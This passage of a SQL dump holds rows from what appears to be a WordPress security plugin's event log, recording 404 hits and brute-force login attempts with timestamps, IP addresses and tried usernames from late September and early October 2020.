20:59:36','2020-09-29 01:59:36','94.139.237.251',NULL,NULL),(71453,'four_oh_four','2020-09-28 21:30:30','2020-09-29 02:30:30','114.119.145.125',NULL,NULL),(71454,'four_oh_four','2020-09-28 22:27:54','2020-09-29 03:27:54','114.119.157.110',NULL,NULL),(71455,'four_oh_four','2020-09-29 03:08:38','2020-09-29 08:08:38','207.46.13.50',NULL,NULL),(71456,'four_oh_four','2020-09-29 03:26:33','2020-09-29 08:26:33','34.77.72.31',NULL,NULL),(71457,'four_oh_four','2020-09-29 03:26:49','2020-09-29 08:26:49','34.77.72.31',NULL,NULL),(71458,'four_oh_four','2020-09-29 03:27:30','2020-09-29 08:27:30','34.77.72.31',NULL,NULL),(71459,'four_oh_four','2020-09-29 03:27:30','2020-09-29 08:27:30','34.77.72.31',NULL,NULL),(71460,'four_oh_four','2020-09-29 03:39:21','2020-09-29 08:39:21','66.249.65.81',NULL,NULL),(71461,'four_oh_four','2020-09-29 04:09:32','2020-09-29 09:09:32','206.123.139.230',NULL,NULL),(71462,'four_oh_four','2020-09-29 04:09:31','2020-09-29 09:09:31','206.123.139.230',NULL,NULL),(71463,'four_oh_four','2020-09-29 04:41:37','2020-09-29 09:41:37','66.249.65.81',NULL,NULL),(71464,'four_oh_four','2020-09-29 05:01:22','2020-09-29 10:01:22','136.243.32.70',NULL,NULL),(71465,'four_oh_four','2020-09-29 06:34:13','2020-09-29 11:34:13','45.145.67.109',NULL,NULL),(71466,'four_oh_four','2020-09-29 07:15:14','2020-09-29 12:15:14','114.119.143.145',NULL,NULL),(71467,'four_oh_four','2020-09-29 08:09:13','2020-09-29 13:09:13','207.46.13.44',NULL,NULL),(71468,'four_oh_four','2020-09-29 08:33:55','2020-09-29 13:33:55','206.123.139.230',NULL,NULL),(71469,'four_oh_four','2020-09-29 09:40:53','2020-09-29 14:40:53','139.59.20.176',NULL,NULL),(71470,'four_oh_four','2020-09-29 09:40:57','2020-09-29 14:40:57','139.59.20.176',NULL,NULL),(71471,'four_oh_four','2020-09-29 09:41:26','2020-09-29 14:41:26','139.59.20.176',NULL,NULL),(71472,'four_oh_four','2020-09-29 09:41:29','2020-09-29 14:41:29','139.59.20.176',NULL,NULL),(71473,'four_oh_four','2020-09-29 10:34:42','2020-09-29 15:34:42','82.208.101.21',NULL,NULL),(71474,'four_oh_four','2020-09-29 11:08:02','2020-09-29 16:08:02','23.228.109.146',NULL,NULL),(71475,'four_oh_four','2020-09-29 11:50:52','2020-09-29 16:50:52','62.76.229.231',NULL,NULL),(71476,'four_oh_four','2020-09-29 13:46:35','2020-09-29 18:46:35','92.38.136.69',NULL,NULL),(71477,'four_oh_four','2020-09-29 14:09:09','2020-09-29 19:09:09','184.154.139.17',NULL,NULL),(71478,'four_oh_four','2020-09-29 14:09:23','2020-09-29 19:09:23','184.154.139.17',NULL,NULL),(71479,'four_oh_four','2020-09-29 14:46:38','2020-09-29 19:46:38','114.119.134.41',NULL,NULL),(71480,'four_oh_four','2020-09-29 15:07:19','2020-09-29 20:07:19','114.119.157.110',NULL,NULL),(71481,'brute_force','2020-09-29 16:28:04','2020-09-29 21:28:04','5.188.62.140',NULL,NULL),(71482,'brute_force','2020-09-29 16:28:04','2020-09-29 21:28:04',NULL,NULL,'adminu'),(71483,'brute_force','2020-09-29 16:59:03','2020-09-29 21:59:03','5.188.62.140',NULL,NULL),(71484,'brute_force','2020-09-29 16:59:03','2020-09-29 21:59:03',NULL,NULL,'adminu'),(71485,'four_oh_four','2020-09-29 17:08:21','2020-09-29 22:08:21','72.221.164.35',NULL,NULL),(71486,'four_oh_four','2020-09-29 17:09:57','2020-09-29 22:09:57','157.55.39.160',NULL,NULL),(71487,'brute_force','2020-09-29 17:29:27','2020-09-29 22:29:27','5.188.62.140',NULL,NULL),(71488,'brute_force','2020-09-29 17:29:27','2020-09-29 22:29:27',NULL,NULL,'adminu'),(71489,'four_oh_four','2020-09-29 17:58:59','2020-09-29 22:58:59','188.233.184.104',NULL,NULL),(71490,'four_oh_four','2020-09-29 19:27:07','2020-09-30 00:27:07','157.55.39.42',NULL,NULL),(71491,'four_oh_four','2020-09-29 19:56:50','2020-09-30 00:56:50','114.119.130.104',NULL,NULL),(71492,'four_oh_four','2020-09-29 21:19:34','2020-09-30 02:19:34','114.119.151.107',NULL,NULL),(71493,'four_oh_four','2020-09-29 22:01:37','2020-09-30 03:01:37','207.46.13.42',NULL,NULL),(71494,'four_oh_four','2020-09-29 22:39:39','2020-09-30 03:39:39','207.46.13.42',NULL,NULL),(71495,'four_oh_four','2020-09-29 22:57:15','2020-09-30 03:57:15','114.119.157.110',NULL,NULL),(71496,'four_oh_four','2020-09-29 23:01:52','2020-09-30 04:01:52','66.249.65.91',NULL,NULL),(71497,'four_oh_four','2020-09-29 23:19:16','2020-09-30 04:19:16','114.119.141.146',NULL,NULL),(71498,'four_oh_four','2020-09-29 23:41:27','2020-09-30 04:41:27','67.201.61.149',NULL,NULL),(71499,'four_oh_four','2020-09-29 23:41:27','2020-09-30 04:41:27','67.201.61.149',NULL,NULL),(71500,'four_oh_four','2020-09-30 00:00:50','2020-09-30 05:00:50','207.46.13.42',NULL,NULL),(71501,'four_oh_four','2020-09-30 00:40:39','2020-09-30 05:40:39','114.119.157.110',NULL,NULL),(71502,'four_oh_four','2020-09-30 01:45:20','2020-09-30 06:45:20','37.115.218.222',NULL,NULL),(71503,'four_oh_four','2020-09-30 04:50:14','2020-09-30 09:50:14','3.94.137.21',NULL,NULL),(71504,'four_oh_four','2020-09-30 04:50:17','2020-09-30 09:50:17','3.94.137.21',NULL,NULL),(71505,'four_oh_four','2020-09-30 05:03:36','2020-09-30 10:03:36','114.119.136.66',NULL,NULL),(71506,'four_oh_four','2020-09-30 05:21:58','2020-09-30 10:21:58','114.119.130.104',NULL,NULL),(71507,'four_oh_four','2020-09-30 06:54:57','2020-09-30 11:54:57','94.139.233.177',NULL,NULL),(71508,'four_oh_four','2020-09-30 06:59:22','2020-09-30 11:59:22','52.201.182.91',NULL,NULL),(71509,'four_oh_four','2020-09-30 07:01:06','2020-09-30 12:01:06','46.187.25.61',NULL,NULL),(71510,'four_oh_four','2020-09-30 08:08:00','2020-09-30 13:08:00','114.119.136.66',NULL,NULL),(71511,'four_oh_four','2020-09-30 08:49:23','2020-09-30 13:49:23','114.119.143.145',NULL,NULL),(71512,'four_oh_four','2020-09-30 11:17:21','2020-09-30 16:17:21','207.46.13.42',NULL,NULL),(71513,'four_oh_four','2020-09-30 14:10:17','2020-09-30 19:10:17','184.154.139.21',NULL,NULL),(71514,'four_oh_four','2020-09-30 14:10:30','2020-09-30 19:10:30','184.154.139.21',NULL,NULL),(71515,'four_oh_four','2020-09-30 15:01:21','2020-09-30 20:01:21','5.188.210.20',NULL,NULL),(71516,'four_oh_four','2020-09-30 16:13:16','2020-09-30 21:13:16','114.119.151.107',NULL,NULL),(71517,'four_oh_four','2020-09-30 16:25:28','2020-09-30 21:25:28','46.243.220.227',NULL,NULL),(71518,'four_oh_four','2020-09-30 18:44:46','2020-09-30 23:44:46','114.119.143.145',NULL,NULL),(71519,'four_oh_four','2020-09-30 20:30:26','2020-10-01 01:30:26','195.246.120.166',NULL,NULL),(71520,'four_oh_four','2020-09-30 20:30:30','2020-10-01 01:30:30','195.246.120.166',NULL,NULL),(71521,'four_oh_four','2020-09-30 21:40:50','2020-10-01 02:40:50','46.187.25.61',NULL,NULL),(71522,'four_oh_four','2020-10-01 01:21:57','2020-10-01 06:21:57','114.119.134.41',NULL,NULL),(71523,'four_oh_four','2020-10-01 01:34:31','2020-10-01 06:34:31','91.207.102.157',NULL,NULL),(71524,'four_oh_four','2020-10-01 01:39:33','2020-10-01 06:39:33','198.187.29.33',NULL,NULL),(71525,'four_oh_four','2020-10-01 02:42:02','2020-10-01 07:42:02','188.165.197.116',NULL,NULL),(71526,'four_oh_four','2020-10-01 06:38:29','2020-10-01 11:38:29','68.71.244.206',NULL,NULL),(71527,'four_oh_four','2020-10-01 06:42:35','2020-10-01 11:42:35','176.99.163.138',NULL,NULL),(71528,'four_oh_four','2020-10-01 06:54:54','2020-10-01 11:54:54','199.217.105.239',NULL,NULL),(71529,'four_oh_four','2020-10-01 08:15:03','2020-10-01 13:15:03','188.122.82.146',NULL,NULL),(71530,'four_oh_four','2020-10-01 09:04:47','2020-10-01 14:04:47','114.119.134.41',NULL,NULL),(71531,'four_oh_four','2020-10-01 09:48:52','2020-10-01 14:48:52','114.119.148.105',NULL,NULL),(71532,'four_oh_four','2020-10-01 11:24:59','2020-10-01 16:24:59','3.94.137.21',NULL,NULL),(71533,'four_oh_four','2020-10-01 11:25:02','2020-10-01 16:25:02','3.94.137.21',NULL,NULL),(71534,'four_oh_four','2020-10-01 12:03:16','2020-10-01 17:03:16','178.159.37.139',NULL,NULL),(71535,'brute_force','2020-10-01 13:38:59','2020-10-01 18:38:59','100.25.142.166',NULL,NULL),(71536,'brute_force','2020-10-01 13:38:59','2020-10-01 18:38:59',NULL,NULL,'admin'),(71537,'brute_force','2020-10-01 13:39:02','2020-10-01 18:39:02','100.25.142.166',NULL,NULL),(71538,'brute_force','2020-10-01 13:39:02','2020-10-01 18:39:02',NULL,NULL,'admin'),(71539,'brute_force','2020-10-01 13:39:05','2020-10-01 18:39:05','100.25.142.166',NULL,NULL),(71540,'brute_force','2020-10-01 13:39:05','2020-10-01 18:39:05',NULL,NULL,'admin'),(71541,'brute_force','2020-10-01 13:39:08','2020-10-01 18:39:08','100.25.142.166',NULL,NULL),(71542,'brute_force','2020-10-01 13:39:08','2020-10-01 18:39:08',NULL,NULL,'admin'),(71543,'brute_force','2020-10-01 13:39:11','2020-10-01 18:39:11','100.25.142.166',NULL,NULL),(71544,'brute_force','2020-10-01 13:39:11','2020-10-01 18:39:11',NULL,NULL,'admin'),(71545,'four_oh_four','2020-10-01 14:08:51','2020-10-01 19:08:51','184.154.139.19',NULL,NULL),(71546,'four_oh_four','2020-10-01 14:09:07','2020-10-01 19:09:07','184.154.139.19',NULL,NULL),(71547,'brute_force','2020-10-01 14:58:54','2020-10-01 19:58:54','185.86.164.110',NULL,NULL),(71548,'brute_force','2020-10-01 14:58:54','2020-10-01 19:58:54',NULL,NULL,'admin'),(71549,'four_oh_four','2020-10-01 16:13:47','2020-10-01 21:13:47','94.139.235.74',NULL,NULL),(71550,'four_oh_four','2020-10-01 17:46:50','2020-10-01 22:46:50','91.76.156.63',NULL,NULL),(71551,'four_oh_four','2020-10-01 18:39:10','2020-10-01 23:39:10','109.248.128.99',NULL,NULL),(71552,'four_oh_four','2020-10-01 18:39:54','2020-10-01 23:39:54','157.55.39.145',NULL,NULL),(71553,'four_oh_four','2020-10-01 18:59:36','2020-10-01 23:59:36','72.83.184.94',NULL,NULL),(71554,'four_oh_four','2020-10-01 18:59:45','2020-10-01 23:59:45','72.83.184.94',NULL,NULL),(71555,'four_oh_four','2020-10-01 21:47:37','2020-10-02 02:47:37','114.119.145.125',NULL,NULL),(71556,'four_oh_four','2020-10-01 22:39:38','2020-10-02 03:39:38','157.55.39.150',NULL,NULL),(71557,'four_oh_four','2020-10-02 00:53:53','2020-10-02 05:53:53','114.119.141.146',NULL,NULL),(71558,'four_oh_four','2020-10-02 02:08:16','2020-10-02 07:08:16','207.46.13.50',NULL,NULL),(71559,'four_oh_four','2020-10-02 02:23:40','2020-10-02 07:23:40','185.123.143.252',NULL,NULL),(71560,'four_oh_four','2020-10-02 03:16:21','2020-10-02 08:16:21','114.119.143.145',NULL,NULL),(71561,'four_oh_four','2020-10-02 03:51:20','2020-10-02 08:51:20','92.38.136.69',NULL,NULL),(71562,'four_oh_four','2020-10-02 04:07:02','2020-10-02 09:07:02','207.46.13.50',NULL,NULL),(71563,'four_oh_four','2020-10-02 04:22:47','2020-10-02 09:22:47','114.119.157.110',NULL,NULL),(71564,'four_oh_four','2020-10-02 04:24:51','2020-10-02 09:24:51','51.68.163.46',NULL,NULL),(71565,'four_oh_four','2020-10-02 04:29:26','2020-10-02 09:29:26','207.102.138.19',NULL,NULL),(71566,'four_oh_four','2020-10-02 05:59:41','2020-10-02 10:59:41','114.119.148.105',NULL,NULL),(71567,'four_oh_four','2020-10-02 07:53:20','2020-10-02 12:53:20','114.119.136.66',NULL,NULL),(71568,'four_oh_four','2020-10-02 08:02:02','2020-10-02 13:02:02','207.46.13.50',NULL,NULL),(71569,'four_oh_four','2020-10-02 08:19:44','2020-10-02 13:19:44','114.119.145.125',NULL,NULL),(71570,'four_oh_four','2020-10-02 08:23:32','2020-10-02 13:23:32','51.68.163.45',NULL,NULL),(71571,'four_oh_four','2020-10-02 08:28:59','2020-10-02 13:28:59','51.77.105.92',NULL,NULL),(71572,'four_oh_four','2020-10-02 08:34:19','2020-10-02 13:34:19','51.77.105.91',NULL,NULL),(71573,'four_oh_four','2020-10-02 08:52:03','2020-10-02 13:52:03','51.77.89.184',NULL,NULL),(71574,'four_oh_four','2020-10-02 09:03:15','2020-10-02 14:03:15','114.119.130.104',NULL,NULL),(71575,'four_oh_four','2020-10-02 09:38:08','2020-10-02 14:38:08','198.50.163.55',NULL,NULL),(71576,'four_oh_four','2020-10-02 11:17:22','2020-10-02 16:17:22','114.119.136.66',NULL,NULL),(71577,'four_oh_four','2020-10-02 12:11:11','2020-10-02 17:11:11','51.255.103.170',NULL,NULL),(71578,'four_oh_four','2020-10-02 12:53:19','2020-10-02 17:53:19','77.83.175.161',NULL,NULL),(71579,'four_oh_four','2020-10-02 12:53:29','2020-10-02 17:53:29','77.83.175.161',NULL,NULL),(71580,'four_oh_four','2020-10-02 13:44:47','2020-10-02 18:44:47','45.64.134.198',NULL,NULL),(71581,'four_oh_four','2020-10-02 14:00:03','2020-10-02 19:00:03','213.59.158.2',NULL,NULL),(71582,'four_oh_four','2020-10-02 14:08:22','2020-10-02 19:08:22','184.154.139.3',NULL,NULL),(71583,'four_oh_four','2020-10-02 14:08:30','2020-10-02 19:08:30','184.154.139.3',NULL,NULL),(71584,'four_oh_four','2020-10-02 14:53:17','2020-10-02 19:53:17','114.119.143.145',NULL,NULL),(71585,'four_oh_four','2020-10-02 14:54:22','2020-10-02 19:54:22','46.187.38.244',NULL,NULL),(71586,'four_oh_four','2020-10-02 16:36:49','2020-10-02 21:36:49','114.119.158.13',NULL,NULL),(71587,'four_oh_four','2020-10-02 17:45:08','2020-10-02 22:45:08','104.227.63.43',NULL,NULL),(71588,'four_oh_four','2020-10-02 18:19:40','2020-10-02 23:19:40','52.201.182.91',NULL,NULL),(71589,'four_oh_four','2020-10-02 18:19:42','2020-10-02 23:19:42','52.201.182.91',NULL,NULL),(71590,'four_oh_four','2020-10-02 18:35:06','2020-10-02 23:35:06','157.230.37.15',NULL,NULL),(71591,'four_oh_four','2020-10-02 18:55:32','2020-10-02 23:55:32','139.196.229.151',NULL,NULL),(71592,'four_oh_four','2020-10-02 19:25:09','2020-10-03 00:25:09','114.119.145.125',NULL,NULL),(71593,'four_oh_four','2020-10-02 21:07:04','2020-10-03 02:07:04','51.79.170.77',NULL,NULL),(71594,'four_oh_four','2020-10-02 21:59:34','2020-10-03 02:59:34','51.222.43.123',NULL,NULL),(71595,'four_oh_four','2020-10-02 22:11:51','2020-10-03 03:11:51','114.119.143.145',NULL,NULL),(71596,'four_oh_four','2020-10-03 00:57:09','2020-10-03 05:57:09','185.255.96.99',NULL,NULL),(71597,'four_oh_four','2020-10-03 01:48:41','2020-10-03 06:48:41','114.119.145.125',NULL,NULL),(71598,'four_oh_four','2020-10-03 02:48:57','2020-10-03 07:48:57','157.55.39.42',NULL,NULL),(71599,'four_oh_four','2020-10-03 02:56:47','2020-10-03 07:56:47','66.249.65.81',NULL,NULL),(71600,'four_oh_four','2020-10-03 03:43:43','2020-10-03 08:43:43','114.119.148.105',NULL,NULL),(71601,'four_oh_four','2020-10-03 04:10:06','2020-10-03 09:10:06','159.89.237.201',NULL,NULL),(71602,'four_oh_four','2020-10-03 07:02:16','2020-10-03 12:02:16','66.249.65.83',NULL,NULL),(71603,'four_oh_four','2020-10-03 09:13:43','2020-10-03 14:13:43','157.55.39.150',NULL,NULL),(71604,'four_oh_four','2020-10-03 09:43:50','2020-10-03 14:43:50','114.119.134.41',NULL,NULL),(71605,'four_oh_four','2020-10-03 10:37:19','2020-10-03 15:37:19','114.119.157.110',NULL,NULL),(71606,'four_oh_four','2020-10-03 10:53:56','2020-10-03 15:53:56','114.119.134.41',NULL,NULL),(71607,'four_oh_four','2020-10-03 13:02:48','2020-10-03 18:02:48','23.228.109.146',NULL,NULL),(71608,'four_oh_four','2020-10-03 14:10:43','2020-10-03 19:10:43','184.154.139.21',NULL,NULL),(71609,'four_oh_four','2020-10-03 14:39:32','2020-10-03 19:39:32','114.119.136.66',NULL,NULL),(71610,'brute_force','2020-10-03 15:05:02','2020-10-03 20:05:02','18.191.217.195',NULL,NULL),(71611,'brute_force','2020-10-03 15:05:02','2020-10-03 20:05:02',NULL,NULL,'admin'),(71612,'brute_force','2020-10-03 15:05:04','2020-10-03 20:05:04','18.191.217.195',NULL,NULL),(71613,'brute_force','2020-10-03 15:05:04','2020-10-03 20:05:04',NULL,NULL,'admin'),(71614,'brute_force','2020-10-03 15:05:09','2020-10-03 20:05:09','18.191.217.195',NULL,NULL),(71615,'brute_force','2020-10-03 15:05:09','2020-10-03 20:05:09',NULL,NULL,'admin'),(71616,'brute_force','2020-10-03 15:05:12','2020-10-03 20:05:12','18.191.217.195',NULL,NULL),(71617,'brute_force','2020-10-03 15:05:12','2020-10-03 20:05:12',NULL,NULL,'admin'),(71618,'brute_force','2020-10-03 15:05:14','2020-10-03 20:05:14','18.191.217.195',NULL,NULL),(71619,'brute_force','2020-10-03 15:05:14','2020-10-03 20:05:14',NULL,NULL,'admin'),(71620,'four_oh_four','2020-10-03 15:43:08','2020-10-03 20:43:08','178.137.88.142',NULL,NULL),(71621,'four_oh_four','2020-10-03 15:51:52','2020-10-03 20:51:52','5.188.84.251',NULL,NULL),(71622,'four_oh_four','2020-10-03 15:52:31','2020-10-03 20:52:31','173.252.87.112',NULL,NULL),(71623,'four_oh_four','2020-10-03 17:26:25','2020-10-03 22:26:25','157.55.39.145',NULL,NULL),(71624,'four_oh_four','2020-10-03 17:58:17','2020-10-03 22:58:17','91.236.12.89',NULL,NULL),(71625,'four_oh_four','2020-10-03 18:26:43','2020-10-03 23:26:43','66.249.65.85',NULL,NULL),(71626,'four_oh_four','2020-10-03 18:46:38','2020-10-03 23:46:38','157.55.39.145',NULL,NULL),(71627,'four_oh_four','2020-10-03 19:46:07','2020-10-04 00:46:07','157.55.39.150',NULL,NULL),(71628,'four_oh_four','2020-10-03 20:05:39','2020-10-04 01:05:39','157.55.39.145',NULL,NULL),(71629,'four_oh_four','2020-10-03 20:22:36','2020-10-04 01:22:36','92.38.136.69',NULL,NULL),(71630,'four_oh_four','2020-10-03 20:48:10','2020-10-04 01:48:10','176.103.94.233',NULL,NULL),(71631,'four_oh_four','2020-10-03 20:55:46','2020-10-04 01:55:46','157.55.39.78',NULL,NULL),(71632,'four_oh_four','2020-10-03 21:08:14','2020-10-04 02:08:14','124.172.232.57',NULL,NULL),(71633,'four_oh_four','2020-10-03 21:55:50','2020-10-04 02:55:50','92.124.160.190',NULL,NULL),(71634,'four_oh_four','2020-10-03 21:55:54','2020-10-04 02:55:54','92.124.160.190',NULL,NULL),(71635,'four_oh_four','2020-10-03 22:17:30','2020-10-04 03:17:30','207.46.13.50',NULL,NULL),(71636,'four_oh_four','2020-10-03 22:22:22','2020-10-04 03:22:22','109.184.239.84',NULL,NULL),(71637,'four_oh_four','2020-10-03 23:49:41','2020-10-04 04:49:41','95.65.81.152',NULL,NULL),(71638,'four_oh_four','2020-10-04 00:46:50','2020-10-04 05:46:50','114.119.157.110',NULL,NULL),(71639,'four_oh_four','2020-10-04 00:47:47','2020-10-04 05:47:47','5.188.84.251',NULL,NULL),(71640,'four_oh_four','2020-10-04 00:52:46','2020-10-04 05:52:46','114.119.136.66',NULL,NULL),(71641,'four_oh_four','2020-10-04 01:06:23','2020-10-04 06:06:23','114.119.141.146',NULL,NULL),(71642,'four_oh_four','2020-10-04 01:20:02','2020-10-04 06:20:02','52.201.182.91',NULL,NULL),(71643,'four_oh_four','2020-10-04 01:20:04','2020-10-04 06:20:04','52.201.182.91',NULL,NULL),(71644,'four_oh_four','2020-10-04 01:35:21','2020-10-04 06:35:21','114.119.148.105',NULL,NULL),(71645,'four_oh_four','2020-10-04 01:54:49','2020-10-04 06:54:49','77.124.46.158',NULL,NULL),(71646,'four_oh_four','2020-10-04 02:08:21','2020-10-04 07:08:21','114.119.141.146',NULL,NULL),(71647,'four_oh_four','2020-10-04 02:58:32','2020-10-04 07:58:32','114.119.141.146',NULL,NULL),(71648,'four_oh_four','2020-10-04 04:40:48','2020-10-04 09:40:48','95.211.211.232',NULL,NULL),(71649,'four_oh_four','2020-10-04 04:40:56','2020-10-04 09:40:56','95.211.211.232',NULL,NULL),(71650,'four_oh_four','2020-10-04 04:41:02','2020-10-04 09:41:02','95.211.211.232',NULL,NULL),(71651,'four_oh_four','2020-10-04 04:41:07','2020-10-04 09:41:07','95.211.211.232',NULL,NULL),(71652,'four_oh_four','2020-10-04 04:41:09','2020-10-04 09:41:09','95.211.211.232',NULL,NULL),(71653,'four_oh_four','2020-10-04 05:08:01','2020-10-04 10:08:01','39.106.223.134',NULL,NULL),(71654,'four_oh_four','2020-10-04 06:45:57','2020-10-04 11:45:57','157.55.39.36',NULL,NULL),(71655,'four_oh_four','2020-10-04 08:27:30','2020-10-04 13:27:30','157.55.39.78',NULL,NULL),(71656,'four_oh_four','2020-10-04 10:28:09','2020-10-04 15:28:09','178.159.37.139',NULL,NULL),(71657,'four_oh_four','2020-10-04 14:02:16','2020-10-04 19:02:16','184.154.139.3',NULL,NULL),(71658,'four_oh_four','2020-10-04 14:21:17','2020-10-04 19:21:17','114.119.134.41',NULL,NULL),(71659,'four_oh_four','2020-10-04 14:27:58','2020-10-04 19:27:58','114.119.148.105',NULL,NULL),(71660,'four_oh_four','2020-10-04 14:48:13','2020-10-04 19:48:13','114.119.134.41',NULL,NULL),(71661,'four_oh_four','2020-10-04 14:55:01','2020-10-04 19:55:01','114.119.134.41',NULL,NULL),(71662,'four_oh_four','2020-10-04 17:18:59','2020-10-04 22:18:59','109.184.175.83',NULL,NULL),(71663,'four_oh_four','2020-10-04 18:05:33','2020-10-04 23:05:33','157.55.39.150',NULL,NULL),(71664,'four_oh_four','2020-10-04 20:37:38','2020-10-05 01:37:38','50.87.253.14',NULL,NULL),(71665,'four_oh_four','2020-10-04 21:30:44','2020-10-05 02:30:44','35.214.146.152',NULL,NULL),(71666,'four_oh_four','2020-10-04 23:13:14','2020-10-05 04:13:14','114.119.134.41',NULL,NULL),(71667,'four_oh_four','2020-10-05 00:43:23','2020-10-05 05:43:23','157.55.39.145',NULL,NULL),(71668,'four_oh_four','2020-10-05 01:00:11','2020-10-05 06:00:11','114.119.136.66',NULL,NULL),(71669,'four_oh_four','2020-10-05 01:19:56','2020-10-05 06:19:56','45.41.132.192',NULL,NULL),(71670,'four_oh_four','2020-10-05 02:48:47','2020-10-05 07:48:47','157.55.39.145',NULL,NULL),(71671,'four_oh_four','2020-10-05 03:52:49','2020-10-05 08:52:49','157.55.39.78',NULL,NULL),(71672,'four_oh_four','2020-10-05 04:14:59','2020-10-05 09:14:59','114.119.141.146',NULL,NULL),(71673,'four_oh_four','2020-10-05 04:49:13','2020-10-05 09:49:13','46.187.38.244',NULL,NULL),(71674,'four_oh_four','2020-10-05 06:12:59','2020-10-05 11:12:59','157.55.39.78',NULL,NULL),(71675,'four_oh_four','2020-10-05 06:52:53','2020-10-05 11:52:53','114.119.134.41',NULL,NULL),(71676,'four_oh_four','2020-10-05 06:52:57','2020-10-05 11:52:57','5.188.84.92',NULL,NULL),(71677,'four_oh_four','2020-10-05 08:40:08','2020-10-05 13:40:08','93.170.123.46',NULL,NULL),(71678,'four_oh_four','2020-10-05 08:45:09','2020-10-05 13:45:09','52.201.182.91',NULL,NULL),(71679,'four_oh_four','2020-10-05 08:45:12','2020-10-05 13:45:12','52.201.182.91',NULL,NULL),(71680,'four_oh_four','2020-10-05 08:52:19','2020-10-05 13:52:19','18.232.188.181',NULL,NULL),(71681,'four_oh_four','2020-10-05 08:52:22','2020-10-05 13:52:22','18.232.188.181',NULL,NULL),(71682,'four_oh_four','2020-10-05 08:52:24','2020-10-05 13:52:24','18.232.188.181',NULL,NULL),(71683,'four_oh_four','2020-10-05 08:52:28','2020-10-05 13:52:28','18.232.188.181',NULL,NULL),(71684,'four_oh_four','2020-10-05 08:52:31','2020-10-05 13:52:31','18.232.188.181',NULL,NULL),(71685,'four_oh_four','2020-10-05 08:52:34','2020-10-05 13:52:34','18.232.188.181',NULL,NULL),(71686,'four_oh_four','2020-10-05 08:52:37','2020-10-05 13:52:37','18.232.188.181',NULL,NULL),(71687,'four_oh_four','2020-10-05 08:52:40','2020-10-05 13:52:40','18.232.188.181',NULL,NULL),(71688,'four_oh_four','2020-10-05 11:46:14','2020-10-05 16:46:14','188.121.41.157',NULL,NULL),(71689,'four_oh_four','2020-10-05 11:46:14','2020-10-05 16:46:14','188.121.41.157',NULL,NULL),(71690,'four_oh_four','2020-10-05 14:00:19','2020-10-05 19:00:19','5.188.84.251',NULL,NULL),(71691,'four_oh_four','2020-10-05 14:02:48','2020-10-05 19:02:48','184.154.139.21',NULL,NULL),(71692,'four_oh_four','2020-10-05 14:55:17','2020-10-05 19:55:17','178.137.88.142',NULL,NULL),(71693,'brute_force','2020-10-05 15:21:05','2020-10-05 20:21:05','5.188.62.25',NULL,NULL),(71694,'brute_force','2020-10-05 15:21:05','2020-10-05 20:21:05',NULL,NULL,'adminu'),(71695,'brute_force','2020-10-05 15:21:10','2020-10-05 20:21:10','5.188.62.25',NULL,NULL),(71696,'brute_force','2020-10-05 15:21:10','2020-10-05 20:21:10',NULL,NULL,'admin'),(71697,'brute_force','2020-10-05 15:34:13','2020-10-05 20:34:13','5.188.62.25',NULL,NULL),(71698,'brute_force','2020-10-05 15:34:13','2020-10-05 20:34:13',NULL,NULL,'adminu'),(71699,'brute_force','2020-10-05 15:47:13','2020-10-05 20:47:13','5.188.62.25',NULL,NULL),(71700,'brute_force','2020-10-05 15:47:13','2020-10-05 20:47:13',NULL,NULL,'adminu'),(71701,'brute_force','2020-10-05 15:47:21','2020-10-05 20:47:21','5.188.62.25',NULL,NULL),(71702,'brute_force','2020-10-05 15:47:21','2020-10-05 20:47:21',NULL,NULL,'admin'),(71703,'brute_force','2020-10-05 16:00:16','2020-10-05 21:00:16','5.188.62.25',NULL,NULL),(71704,'brute_force','2020-10-05 16:00:16','2020-10-05 21:00:16',NULL,NULL,'adminu'),(71705,'brute_force','2020-10-05 16:00:20','2020-10-05 21:00:20','5.188.62.25',NULL,NULL),(71706,'brute_force','2020-10-05 16:00:20','2020-10-05 21:00:20',NULL,NULL,'admin'),(71707,'brute_force','2020-10-05 16:13:21','2020-10-05 21:13:21','5.188.62.25',NULL,NULL),(71708,'brute_force','2020-10-05 16:13:21','2020-10-05 21:13:21',NULL,NULL,'adminu'),(71709,'brute_force','2020-10-05 16:13:27','2020-10-05 21:13:27','5.188.62.25',NULL,NULL),(71710,'brute_force','2020-10-05 16:13:27','2020-10-05 21:13:27',NULL,NULL,'admin'),(71711,'brute_force','2020-10-05 16:26:34','2020-10-05 21:26:34','5.188.62.25',NULL,NULL),(71712,'brute_force','2020-10-05 16:26:34','2020-10-05 21:26:34',NULL,NULL,'adminu'),(71713,'brute_force','2020-10-05 16:26:38','2020-10-05 21:26:38','5.188.62.25',NULL,NULL),(71714,'brute_force','2020-10-05 16:26:38','2020-10-05 21:26:38',NULL,NULL,'admin'),(71715,'brute_force','2020-10-05 16:39:31','2020-10-05 21:39:31','5.188.62.25',NULL,NULL),(71716,'brute_force','2020-10-05 16:39:31','2020-10-05 21:39:31',NULL,NULL,'adminu'),(71717,'brute_force','2020-10-05 16:39:35','2020-10-05 21:39:35','5.188.62.25',NULL,NULL),(71718,'brute_force','2020-10-05 16:39:35','2020-10-05 21:39:35',NULL,NULL,'admin'),(71719,'brute_force','2020-10-05 16:53:04','2020-10-05 21:53:04','5.188.62.25',NULL,NULL),(71720,'brute_force','2020-10-05 16:53:04','2020-10-05 21:53:04',NULL,NULL,'adminu'),(71721,'brute_force','2020-10-05 16:53:11','2020-10-05 21:53:11','5.188.62.25',NULL,NULL),(71722,'brute_force','2020-10-05 16:53:11','2020-10-05 21:53:11',NULL,NULL,'admin'),(71723,'brute_force','2020-10-05 17:06:42','2020-10-05 22:06:42','5.188.62.25',NULL,NULL),(71724,'brute_force','2020-10-05 17:06:42','2020-10-05 22:06:42',NULL,NULL,'adminu'),(71725,'brute_force','2020-10-05 17:06:46','2020-10-05 22:06:46','5.188.62.25',NULL,NULL),(71726,'brute_force','2020-10-05 17:06:46','2020-10-05 22:06:46',NULL,NULL,'zphiblgz'),(71727,'brute_force','2020-10-05 17:20:07','2020-10-05 22:20:07','5.188.62.25',NULL,NULL),(71728,'brute_force','2020-10-05 17:20:07','2020-10-05 22:20:07',NULL,NULL,'adminu'),(71729,'brute_force','2020-10-05 17:20:12','2020-10-05 22:20:12','5.188.62.25',NULL,NULL),(71730,'brute_force','2020-10-05 17:20:12','2020-10-05 22:20:12',NULL,NULL,'zphiblgz'),(71731,'four_oh_four','2020-10-05 17:21:41','2020-10-05 22:21:41','114.119.158.13',NULL,NULL),(71732,'brute_force','2020-10-05 17:33:27','2020-10-05 22:33:27','5.188.62.25',NULL,NULL),(71733,'brute_force','2020-10-05 17:33:27','2020-10-05 